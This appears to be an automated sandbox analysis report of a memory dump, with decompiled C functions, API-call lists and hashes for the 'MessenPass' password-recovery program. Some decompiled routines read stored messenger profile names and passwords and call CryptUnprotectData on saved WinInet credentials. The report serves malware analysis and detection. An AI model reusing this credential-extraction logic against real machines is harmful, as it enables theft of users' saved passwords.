                                          0x0040a2ab
                                          0x0040a2b2
                                          0x0040a2b7
                                          0x0040a2c3
                                          0x0040a2c6
                                          0x0040a2d0
                                          0x0040a2d5
                                          0x0040a2df
                                          0x0040a2e4
                                          0x0040a2e4
                                          0x0040a2ef
                                          0x0040a2f9
                                          0x0040a2fc
                                          0x0040a306
                                          0x0040a30c
                                          0x0040a31b
                                          0x0040a326
                                          0x0040a32c
                                          0x0040a32f
                                          0x0040a333
                                          0x0040a337
                                          0x0040a33f
                                          0x0040a342
                                          0x0040a34d
                                          0x0040a35a
                                          0x0040a369
                                          0x0040a36e
                                          0x0040a37c
                                          0x0040a383
                                          0x0040a386
                                          0x0040a38c
                                          0x0040a3c1
                                          0x0040a38e
                                          0x0040a39d
                                          0x0040a3a4
                                          0x0040a3ad
                                          0x0040a3b2
                                          0x0040a3b2
                                          0x0040a3c8
                                          0x0040a3cb
                                          0x0040a3cf
                                          0x0040a3dc
                                          0x0040a3e2
                                          0x0040a3ec
                                          0x0040a410
                                          0x0040a41b
                                          0x0040a420
                                          0x0040a423
                                          0x0040a42c
                                          0x00000000
                                          0x00000000
                                          0x0040a304
                                          0x0040a304
                                          0x0040a306
                                          0x0040a432
                                          0x0040a43a
                                          0x0040a452

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                          • API String ID: 710961058-601624466
                                          • Opcode ID: 01ba515a634d510913fe2f235f109e28ad47b200226b44b89f882b7dae9418f4
                                          • Instruction ID: 690333ed3326df0f6eed54148ed3e596883a3b3feedda5c4c7dc15c04e40e9a4
                                          • Opcode Fuzzy Hash: 01ba515a634d510913fe2f235f109e28ad47b200226b44b89f882b7dae9418f4
                                          • Instruction Fuzzy Hash: 5B61AE31900208AFDF14DF54CC86EDE7B79EF08314F1001AAF909AB1D2DB799A94CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040DD65, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 178stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 81%
                                          			E0040DD65(intOrPtr* _a4, char* _a8, char* _a12, intOrPtr _a16) {
				void _v267;
				char _v268;
				void _v523;
				char _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				int _v788;
				int _v1044;
				void _v2067;
				char _v2068;
				void _v3091;
				char _v3092;
				void _v4115;
				int _v4116;
				void* __ebx;
				void* __edi;
				int _t62;
				intOrPtr* _t95;
				int _t111;
				int _t118;
				intOrPtr* _t128;
				void* _t134;
				void* _t135;
				void* _t136;

				0x414060();
				_t111 = 0;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t62 = strlen(_a8);
				_t6 = strlen(_a12) + 1; // 0x1
				_t135 = _t134 + 0x14;
				if(_t62 + _t6 >= 0x104) {
					_v268 = 0;
				} else {
					E00406B4B( &_v268, _a8, _a12);
				}
				if(E004069D3( &_v268) != 0) {
					memset( &_v2067, _t111, 0x3ff);
					memset( &_v3091, _t111, 0x3ff);
					memset( &_v4115, _t111, 0x3ff);
					_v524 = _t111;
					memset( &_v523, _t111, 0xfe);
					_push(_t111);
					_a12 = _t111;
					_v2068 = _t111;
					_v3092 = _t111;
					_v4116 = _t111;
					sprintf( &_v524, "profile %d");
					_t136 = _t135 + 0x3c;
					GetPrivateProfileStringA( &_v524, "name", 0x417c88,  &_v2068, 0x3ff,  &_v268);
					GetPrivateProfileStringA( &_v524, "password", 0x417c88,  &_v3092, 0x3ff,  &_v268);
					if(_v2068 != _t111) {
						L7:
						while(_v3092 != _t111) {
							E0040DCF2( &_v4116,  &_v3092);
							_v528 = _a16;
							_v1044 = _t111;
							_v788 = _t111;
							_v532 = 3;
							E00406958(0xff,  &_v788,  &_v4116);
							_t128 =  &_v1044;
							E00406958(0xff, _t128,  &_v2068);
							_t118 = _v1044;
							_t95 = _t128;
							while(_t118 != 0) {
								if(_t118 >= 0x30 && _t118 <= 0x39) {
									_t95 = _t95 + 1;
									_t118 =  *_t95;
									continue;
								}
								L14:
								_push( &_v1044);
								if( *((intOrPtr*)( *_a4))() != 0) {
									_a12 =  &(_a12[1]);
									_push(_a12);
									_v2068 = 0;
									_v3092 = 0;
									_v4116 = 0;
									sprintf( &_v524, "profile %d");
									_t136 = _t136 + 0xc;
									GetPrivateProfileStringA( &_v524, "name", 0x417c88,  &_v2068, 0x3ff,  &_v268);
									GetPrivateProfileStringA( &_v524, "password", 0x417c88,  &_v3092, 0x3ff,  &_v268);
									if(_v2068 != 0) {
										_t111 = 0;
										goto L7;
									}
								}
								goto L16;
							}
							_v528 = 3;
							goto L14;
						}
					}
				}
				L16:
				return 1;
			}



























                                          0x0040dd6d
                                          0x0040dd7a
                                          0x0040dd85
                                          0x0040dd8b
                                          0x0040dd93
                                          0x0040dda2
                                          0x0040dda6
                                          0x0040ddab
                                          0x0040ddc2
                                          0x0040ddad
                                          0x0040ddb9
                                          0x0040ddbf
                                          0x0040ddd7
                                          0x0040ddeb
                                          0x0040ddf9
                                          0x0040de07
                                          0x0040de19
                                          0x0040de1f
                                          0x0040de24
                                          0x0040de31
                                          0x0040de34
                                          0x0040de3a
                                          0x0040de40
                                          0x0040de46
                                          0x0040de51
                                          0x0040de74
                                          0x0040de96
                                          0x0040de9e
                                          0x00000000
                                          0x0040dea8
                                          0x0040dec2
                                          0x0040deca
                                          0x0040ded6
                                          0x0040dedc
                                          0x0040deee
                                          0x0040def8
                                          0x0040df04
                                          0x0040df0a
                                          0x0040df11
                                          0x0040df17
                                          0x0040df28
                                          0x0040df1e
                                          0x0040df25
                                          0x0040df26
                                          0x00000000
                                          0x0040df26
                                          0x0040df36
                                          0x0040df41
                                          0x0040df46
                                          0x0040df4c
                                          0x0040df4f
                                          0x0040df5e
                                          0x0040df65
                                          0x0040df6c
                                          0x0040df73
                                          0x0040df7e
                                          0x0040dfa2
                                          0x0040dfc0
                                          0x0040dfc9
                                          0x0040dea6
                                          0x00000000
                                          0x0040dea6
                                          0x0040dfc9
                                          0x00000000
                                          0x0040df46
                                          0x0040df2c
                                          0x00000000
                                          0x0040df2c
                                          0x0040dea8
                                          0x0040de9e
                                          0x0040dfcf
                                          0x0040dfd6

                                          APIs
                                          • memset.MSVCRT ref: 0040DD8B
                                          • strlen.MSVCRT ref: 0040DD93
                                          • strlen.MSVCRT ref: 0040DD9D
                                          • memset.MSVCRT ref: 0040DDEB
                                          • memset.MSVCRT ref: 0040DDF9
                                          • memset.MSVCRT ref: 0040DE07
                                          • memset.MSVCRT ref: 0040DE1F
                                          • sprintf.MSVCRT ref: 0040DE46
                                          • GetPrivateProfileStringA.KERNEL32(?,name,00417C88,?,000003FF,?), ref: 0040DE74
                                          • GetPrivateProfileStringA.KERNEL32(?,password,00417C88,?,000003FF,?), ref: 0040DE96
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          • sprintf.MSVCRT ref: 0040DF73
                                          • GetPrivateProfileStringA.KERNEL32(?,name,00417C88,?,000003FF,?), ref: 0040DFA2
                                          • GetPrivateProfileStringA.KERNEL32(?,password,00417C88,?,000003FF,?), ref: 0040DFC0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$PrivateProfileString$sprintfstrlen$_mbscat_mbscpy
                                          • String ID: name$password$profile %d
                                          • API String ID: 3544386798-2462908242
                                          • Opcode ID: e7b187a0626f75cc39379d2bba276785f1ae62edefe99cb3f3bfbc37819d7c60
                                          • Instruction ID: 9e46ac0295d5b354e730bb81602d93da8fcedc4e5bf25204c2bd197169999166
                                          • Opcode Fuzzy Hash: e7b187a0626f75cc39379d2bba276785f1ae62edefe99cb3f3bfbc37819d7c60
                                          • Instruction Fuzzy Hash: DA61A5B284425DAEDB20DB54DC40FDA77BCAF15304F1444EAA559E3141DBB89FC88FA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004125F1, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: sprintf$memset$_mbscpy
                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                          • API String ID: 3402215030-3842416460
                                          • Opcode ID: ea06b0d74ada23c5ef34a7984231b84acf2e1d6cd6bcfe81b43f4a3791556408
                                          • Instruction ID: a5bfc8ec8e60557daa4b034ce7241d6b1778398f1e76627a293d7ac05c42f781
                                          • Opcode Fuzzy Hash: ea06b0d74ada23c5ef34a7984231b84acf2e1d6cd6bcfe81b43f4a3791556408
                                          • Instruction Fuzzy Hash: D24173B280121DBADB21EE54DC45FEB776CAF14309F0400ABF518E2142E6789FD88BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004010D0, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 111COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E004010D0(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, signed short _a12) {
				void* __edi;
				void* _t28;
				void* _t37;
				unsigned int _t38;
				void* _t44;
				void* _t49;
				signed short _t50;
				struct HWND__* _t52;
				signed short _t58;
				struct HWND__* _t60;
				void* _t70;
				void* _t71;

				_t70 = __edx;
				_t28 = _a4 - 0x110;
				_t71 = __ecx;
				if(_t28 == 0) {
					SetWindowTextA( *(__ecx + 4), "MessenPass");
					SetDlgItemTextA( *(_t71 + 4), 0x3ea, _t71 + 0xc);
					SetDlgItemTextA( *(_t71 + 4), 0x3ec, _t71 + 0x10b);
					E00401085(_t71);
					E00406CAA(_t70,  *(_t71 + 4));
					L16:
					return 0;
				}
				_t37 = _t28 - 1;
				if(_t37 == 0) {
					_t38 = _a8;
					if(_t38 != 1 || _t38 >> 0x10 != 0) {
						goto L16;
					} else {
						EndDialog( *(__ecx + 4), 1);
						DeleteObject( *(_t71 + 0x20c));
						L7:
						return 1;
					}
				}
				_t44 = _t37 - 0x27;
				if(_t44 == 0) {
					if(_a12 != GetDlgItem( *(__ecx + 4), 0x3ec)) {
						goto L16;
					}
					SetBkMode(_a8, 1);
					SetTextColor(_a8, 0xc00000);
					return GetSysColorBrush(0xf);
				}
				_t49 = _t44 - 0xc8;
				if(_t49 == 0) {
					_t50 = _a12;
					_t52 = GetDlgItem( *(__ecx + 4), 0x3ec);
					_push(_t50 >> 0x10);
					_a12 = _t52;
					if(ChildWindowFromPoint( *(_t71 + 4), _t50 & 0x0000ffff) != _a12) {
						goto L16;
					}
					SetCursor(LoadCursorA( *0x41dbd4, 0x67));
					goto L7;
				}
				if(_t49 != 0) {
					goto L16;
				}
				_t58 = _a12;
				_t60 = GetDlgItem( *(__ecx + 4), 0x3ec);
				_push(_t58 >> 0x10);
				_a12 = _t60;
				if(ChildWindowFromPoint( *(_t71 + 4), _t58 & 0x0000ffff) != _a12) {
					goto L16;
				}
				E00406D6B( *(_t71 + 4), _t71 + 0x10b);
				goto L7;
			}















                                          0x004010d0
                                          0x004010d6
                                          0x004010de
                                          0x004010e0
                                          0x00401204
                                          0x0040121c
                                          0x0040122d
                                          0x0040122f
                                          0x00401237
                                          0x0040123d
                                          0x00000000
                                          0x0040123d
                                          0x004010e6
                                          0x004010e7
                                          0x004011cf
                                          0x004011d6
                                          0x00000000
                                          0x004011e0
                                          0x004011e5
                                          0x004011f1
                                          0x00401146
                                          0x00000000
                                          0x00401148
                                          0x004011d6
                                          0x004010ed
                                          0x004010f0
                                          0x004011a6
                                          0x00000000
                                          0x00000000
                                          0x004011b1
                                          0x004011bf
                                          0x00000000
                                          0x004011c7
                                          0x004010f6
                                          0x004010fb
                                          0x0040114e
                                          0x00401161
                                          0x00401167
                                          0x0040116c
                                          0x00401178
                                          0x00000000
                                          0x00000000
                                          0x0040118d
                                          0x00000000
                                          0x0040118d
                                          0x004010ff
                                          0x00000000
                                          0x00000000
                                          0x00401105
                                          0x00401118
                                          0x0040111e
                                          0x00401123
                                          0x0040112f
                                          0x00000000
                                          0x00000000
                                          0x0040113f
                                          0x00000000

                                          APIs
                                          • GetDlgItem.USER32(?,000003EC), ref: 00401118
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401126
                                            • Part of subcall function 00406D6B: ShellExecuteA.SHELL32(?,open,?,00417C88,00417C88,00000005), ref: 00406D81
                                          • GetDlgItem.USER32(?,000003EC), ref: 00401161
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 0040116F
                                          • LoadCursorA.USER32(00000067), ref: 00401186
                                          • SetCursor.USER32(00000000,?,?), ref: 0040118D
                                          • GetDlgItem.USER32(?,000003EC), ref: 0040119D
                                          • SetBkMode.GDI32(?,00000001), ref: 004011B1
                                          • SetTextColor.GDI32(?,00C00000), ref: 004011BF
                                          • GetSysColorBrush.USER32(0000000F), ref: 004011C7
                                          • EndDialog.USER32(?,00000001), ref: 004011E5
                                          • DeleteObject.GDI32(?), ref: 004011F1
                                          • SetWindowTextA.USER32(?,MessenPass), ref: 00401204
                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040121C
                                          • SetDlgItemTextA.USER32(?,000003EC,?), ref: 0040122D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Item$Text$Window$ChildColorCursorFromPoint$BrushDeleteDialogExecuteLoadModeObjectShell
                                          • String ID: MessenPass
                                          • API String ID: 2410034309-1347981195
                                          • Opcode ID: 843b1ff313390d25d34e2be648776c3666369c8dad7882cf094c1c7715f69dbe
                                          • Instruction ID: 61c274a33cdd550ae885db2c0d410d86e96b4f8b628e001bd40ef85afa118776
                                          • Opcode Fuzzy Hash: 843b1ff313390d25d34e2be648776c3666369c8dad7882cf094c1c7715f69dbe
                                          • Instruction Fuzzy Hash: 6D31D271500A4AFBDB026FA0DD49EEABB7AFB44301F508236F915E61B0C7759861DB88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040C50E, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpi
                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                          • API String ID: 1439213657-1959339147
                                          • Opcode ID: 42829d603ed6219f05e00acd70f5009b327ef2ea2f3e71e7fd8bced316a66bba
                                          • Instruction ID: dd15bb3cc8bdf641e1a17555e2464251a39e176c696be1a009fdff25c7df10cc
                                          • Opcode Fuzzy Hash: 42829d603ed6219f05e00acd70f5009b327ef2ea2f3e71e7fd8bced316a66bba
                                          • Instruction Fuzzy Hash: DE011AB229A32178F9286A773C07BD70A488B51F7BF70065FF408E40C1FE5C968054AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404D18, Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 33libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00404D18(struct HINSTANCE__** __esi) {
				void* _t7;
				struct HINSTANCE__* _t8;
				_Unknown_base(*)()* _t14;

				if( *__esi == 0) {
					_t8 = LoadLibraryA("advapi32.dll");
					 *__esi = _t8;
					__esi[1] = GetProcAddress(_t8, "CryptAcquireContextA");
					__esi[2] = GetProcAddress( *__esi, "CryptReleaseContext");
					__esi[3] = GetProcAddress( *__esi, "CryptCreateHash");
					__esi[4] = GetProcAddress( *__esi, "CryptGetHashParam");
					__esi[5] = GetProcAddress( *__esi, "CryptHashData");
					_t14 = GetProcAddress( *__esi, "CryptDestroyHash");
					__esi[6] = _t14;
					return _t14;
				}
				return _t7;
			}






                                          0x00404d1b
                                          0x00404d23
                                          0x00404d35
                                          0x00404d40
                                          0x00404d4c
                                          0x00404d58
                                          0x00404d64
                                          0x00404d70
                                          0x00404d73
                                          0x00404d75
                                          0x00000000
                                          0x00404d78
                                          0x00404d79

                                          APIs
                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,004084A6), ref: 00404D23
                                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404D37
                                          • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00404D43
                                          • GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00404D4F
                                          • GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00404D5B
                                          • GetProcAddress.KERNEL32(?,CryptHashData), ref: 00404D67
                                          • GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00404D73
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID: CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$advapi32.dll
                                          • API String ID: 2238633743-1621422469
                                          • Opcode ID: 11447201b65d866f37edbf99505d086a0ab8926e77609814987dd4a6320f0436
                                          • Instruction ID: 844867562ca0833f301e0ac6fd14d3db62e181894ebadeef568166b0b2be0524
                                          • Opcode Fuzzy Hash: 11447201b65d866f37edbf99505d086a0ab8926e77609814987dd4a6320f0436
                                          • Instruction Fuzzy Hash: 4FF09774940B48AECB30AF759C09E86BEE1EF9C7007224D2EE2C553650DA799084CE88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404578, Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 240COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E00404578(wchar_t** __ebx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _v36;
				int _v40;
				void* _v44;
				int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				wchar_t* _v64;
				int _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				intOrPtr _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				intOrPtr _v108;
				char _v112;
				long _v148;
				short _v666;
				void _v1176;
				char _v2200;
				char _v2712;
				void _v3222;
				char _v3224;
				void* __esi;
				int _t118;
				signed int _t122;
				signed int _t123;
				wchar_t* _t127;
				int _t129;
				int _t137;
				void* _t146;
				int _t156;
				wchar_t* _t160;
				wchar_t* _t161;
				void* _t165;
				int _t175;
				wchar_t* _t178;
				wchar_t** _t182;
				signed int _t183;
				void* _t203;
				signed int _t205;
				signed int _t207;
				wchar_t* _t210;
				wchar_t* _t214;
				void* _t215;
				void* _t216;
				intOrPtr* _t217;
				void* _t218;
				void* _t243;

				_t182 = __ebx;
				_t183 = 9;
				memcpy( &_v148, 0x417fb8, _t183 << 2);
				_t217 = _t216 + 0xc;
				_t118 = wcslen( &_v148);
				_t205 = 0;
				_v68 = _t118;
				 *_t217 = 0xbfe;
				_v3224 = 0;
				memset( &_v3222, 0, ??);
				_t218 = _t217 + 0xc;
				if(E00406B3B() == 0) {
					_push(3);
					_v20 = 4;
				} else {
					_push(4);
					_v20 = 5;
				}
				_pop(_t122);
				_t123 = _t122 << 9;
				_v28 = _t123;
				_t182[1] = _t215 + _t123 - 0xc94;
				 *_t182 =  &_v3224;
				_t182[3] =  &_v2712;
				_t127 = _t215 + (_v20 << 9) - 0xc94;
				_t182[4] =  &_v2200;
				_v64 = _t127;
				_t182[2] = _t127;
				_t203 = 0;
				_v12 = _t205;
				goto L5;
				L6:
				_v24 = _t205;
				_v32 = _t205;
				if(_v12 != _v20) {
					L20:
					if(_v12 != 4) {
						L30:
						if(_v32 == 0) {
							_t137 = _v16;
							if(_t137 > 0x1fa) {
								_t137 = 0x1fa;
							}
							_t99 = _a8 + 4; // 0x8
							_t207 = _v12 << 9;
							memcpy(_t215 + _t207 - 0xc94, _t203 + _t99, _t137);
							 *(_t215 + _t207 - 0xa96) =  *(_t215 + _t207 - 0xa96) & 0x00000000;
							_t218 = _t218 + 0xc;
							if(_v12 == 0) {
								E00406B3B();
							}
						}
						goto L35;
					}
					_t232 = _t182[5] - 4;
					if(_t182[5] != 4) {
						goto L30;
					}
					_v60 = 0;
					_v52 = 0;
					_v56 = 0;
					if(E00404C9D( &_v60, _t232) == 0) {
						L29:
						E00404CE0( &_v60);
						if(_v24 != 0) {
							goto L35;
						}
						goto L30;
					}
					_t146 = 0;
					do {
						 *(_t146 + 0x41eb80) =  *(_t146 + 0x41da78) << 2;
						_t146 = _t146 + 2;
					} while (_t146 < 0x4a);
					_t76 = _a8 + 4; // 0x8
					_v100 = _t203 + _t76;
					_v104 = _v16;
					_v88 = 0x4a;
					_v84 = 0x41eb80;
					if(E00404CF5( &_v60,  &_v104,  &_v88,  &_v48) != 0) {
						_t156 = _v48;
						if(_t156 > 0x1fa) {
							_t156 = 0x1fa;
						}
						memcpy( &_v1176, _v44, _t156);
						_t218 = _t218 + 0xc;
						_v666 = 0;
						LocalFree(_v44);
						_v24 = 1;
					}
					goto L29;
				} else {
					_t210 =  *_t182;
					_t160 = wcschr(_t210, 0x3d);
					if(_t160 != 0) {
						_t31 =  &(_t160[0]); // 0x2
						_t210 = _t31;
					}
					_t161 =  &_v148;
					0x413d86(_t210, _t161, _v68);
					_t218 = _t218 + 0xc;
					_t223 = _t161;
					if(_t161 != 0) {
						goto L20;
					}
					_v80 = 0;
					_v72 = 0;
					_v76 = 0;
					if(E00404C9D( &_v80, _t223) == 0) {
						L19:
						E00404CE0( &_v80);
						goto L20;
					}
					_t165 = 0;
					do {
						 *(_t165 + 0x41e980) =  *(_t165 + 0x41dac8) << 2;
						_t165 = _t165 + 2;
					} while (_t165 < 0x4a);
					_t42 = _a8 + 4; // 0x8
					_v108 = _t203 + _t42;
					_v112 = _v16;
					_v96 = 0x4a;
					_v92 = 0x41e980;
					if(E00404CF5( &_v80,  &_v112,  &_v96,  &_v40) != 0) {
						_t175 = _v40;
						if(_t175 > 0x1fa) {
							_t175 = 0x1fa;
						}
						_t214 = _t215 + _v28 - 0xc94;
						memcpy(_t214, _v36, _t175);
						 *(_t215 + _v28 - 0xa96) =  *(_t215 + _v28 - 0xa96) & 0x00000000;
						_t178 = wcschr(_t214, 0x3a);
						_t218 = _t218 + 0x14;
						if(_t178 != 0) {
							 *_t178 =  *_t178 & 0x00000000;
							wcscpy(_v64,  &(_t178[0]));
						}
						_v32 = 1;
						LocalFree(_v36);
					}
					goto L19;
				}
				L35:
				_v12 = _v12 + 1;
				_t203 = _t203 + _v16 + 4;
				if(E00406B3B() == 0) {
					__eflags = _v12 - 5;
				} else {
					_t243 = _v12 - 6;
				}
				if(_t243 >= 0 || _t203 > _a12) {
					 *((intOrPtr*)( *_a4))(_t182);
					return 1;
				} else {
					_t205 = 0;
					__eflags = 0;
					L5:
					_t129 =  *(_t203 + _a8);
					_v16 = _t129;
					if(_t129 <= _t205) {
						goto L35;
					}
					goto L6;
				}
			}






























































                                          0x00404578
                                          0x00404585
                                          0x00404598
                                          0x00404598
                                          0x0040459a
                                          0x0040459f
                                          0x004045a1
                                          0x004045a4
                                          0x004045b3
                                          0x004045ba
                                          0x004045bf
                                          0x004045c9
                                          0x004045d6
                                          0x004045d8
                                          0x004045cb
                                          0x004045cb
                                          0x004045cd
                                          0x004045cd
                                          0x004045df
                                          0x004045e0
                                          0x004045e3
                                          0x004045f3
                                          0x004045f9
                                          0x00404604
                                          0x00404607
                                          0x00404614
                                          0x00404617
                                          0x0040461a
                                          0x0040461d
                                          0x0040461f
                                          0x00404622
                                          0x00404637
                                          0x0040463d
                                          0x00404640
                                          0x00404643
                                          0x0040474a
                                          0x0040474e
                                          0x00404810
                                          0x00404814
                                          0x00404816
                                          0x00404820
                                          0x00404822
                                          0x00404822
                                          0x0040482b
                                          0x00404830
                                          0x0040483b
                                          0x00404840
                                          0x00404849
                                          0x00404850
                                          0x00404852
                                          0x00404852
                                          0x00404850
                                          0x00000000
                                          0x00404814
                                          0x00404754
                                          0x00404758
                                          0x00000000
                                          0x00000000
                                          0x00404763
                                          0x00404766
                                          0x00404769
                                          0x00404773
                                          0x00404802
                                          0x00404805
                                          0x0040480e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040480e
                                          0x00404779
                                          0x0040477b
                                          0x00404786
                                          0x0040478e
                                          0x0040478f
                                          0x00404797
                                          0x0040479b
                                          0x004047a1
                                          0x004047b3
                                          0x004047ba
                                          0x004047c8
                                          0x004047ca
                                          0x004047d4
                                          0x004047d6
                                          0x004047d6
                                          0x004047e3
                                          0x004047e8
                                          0x004047ee
                                          0x004047f5
                                          0x004047fb
                                          0x004047fb
                                          0x00000000
                                          0x00404649
                                          0x00404649
                                          0x0040464e
                                          0x00404657
                                          0x00404659
                                          0x00404659
                                          0x00404659
                                          0x0040465f
                                          0x00404667
                                          0x0040466c
                                          0x0040466f
                                          0x00404671
                                          0x00000000
                                          0x00000000
                                          0x0040467c
                                          0x0040467f
                                          0x00404682
                                          0x0040468c
                                          0x00404742
                                          0x00404745
                                          0x00000000
                                          0x00404745
                                          0x00404692
                                          0x00404694
                                          0x0040469f
                                          0x004046a7
                                          0x004046a8
                                          0x004046b0
                                          0x004046b4
                                          0x004046ba
                                          0x004046cc
                                          0x004046d3
                                          0x004046e1
                                          0x004046e3
                                          0x004046ed
                                          0x004046ef
                                          0x004046ef
                                          0x004046f8
                                          0x00404700
                                          0x00404708
                                          0x00404714
                                          0x00404719
                                          0x0040471e
                                          0x00404720
                                          0x0040472b
                                          0x00404731
                                          0x00404735
                                          0x0040473c
                                          0x0040473c
                                          0x00000000
                                          0x004046e1
                                          0x00404857
                                          0x0040485a
                                          0x0040485d
                                          0x00404868
                                          0x00404870
                                          0x0040486a
                                          0x0040486a
                                          0x0040486a
                                          0x00404874
                                          0x00404885
                                          0x0040488d
                                          0x00404624
                                          0x00404624
                                          0x00404624
                                          0x00404626
                                          0x00404629
                                          0x0040462e
                                          0x00404631
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00404631

                                          APIs
                                          • wcslen.MSVCRT ref: 0040459A
                                          • memset.MSVCRT ref: 004045BA
                                          • wcschr.MSVCRT ref: 0040464E
                                          • _wcsncoll.MSVCRT ref: 00404667
                                          • memcpy.MSVCRT ref: 00404700
                                          • wcschr.MSVCRT ref: 00404714
                                          • wcscpy.MSVCRT ref: 0040472B
                                          • memcpy.MSVCRT ref: 004047E3
                                          • LocalFree.KERNEL32(?,?,?,?,?,?), ref: 004047F5
                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0040473C
                                            • Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                          • memcpy.MSVCRT ref: 0040483B
                                            • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                            • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Freememcpy$LibraryLocalwcschr$AddressLoadProc_wcsncollmemsetwcscpywcslen
                                          • String ID: ?L@$Microsoft_WinInet
                                          • API String ID: 1802959924-2674056311
                                          • Opcode ID: fe56d977aabb073792e25c405abe676263accf88416be629dc76c317c79dc49e
                                          • Instruction ID: 38d9b8d34b298c31677a0e9ec7c60157448ec74f6fc12d2487dcaf445e5773ed
                                          • Opcode Fuzzy Hash: fe56d977aabb073792e25c405abe676263accf88416be629dc76c317c79dc49e
                                          • Instruction Fuzzy Hash: 7FA16DB6D002199BDF10DFA5D844AEEB7B8FF44304F00846BEA19F7281E7789A45CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004137CE, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004137F3
                                            • Part of subcall function 00413646: strlen.MSVCRT ref: 00413653
                                          • strlen.MSVCRT ref: 0041380F
                                          • memset.MSVCRT ref: 00413849
                                          • memset.MSVCRT ref: 0041385D
                                          • memset.MSVCRT ref: 00413871
                                          • memset.MSVCRT ref: 00413897
                                            • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C9BA
                                            • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
                                            • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
                                            • Part of subcall function 0040C9C7: memcpy.MSVCRT ref: 0040CA33
                                            • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D
                                          • memcpy.MSVCRT ref: 004138CE
                                            • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C96C
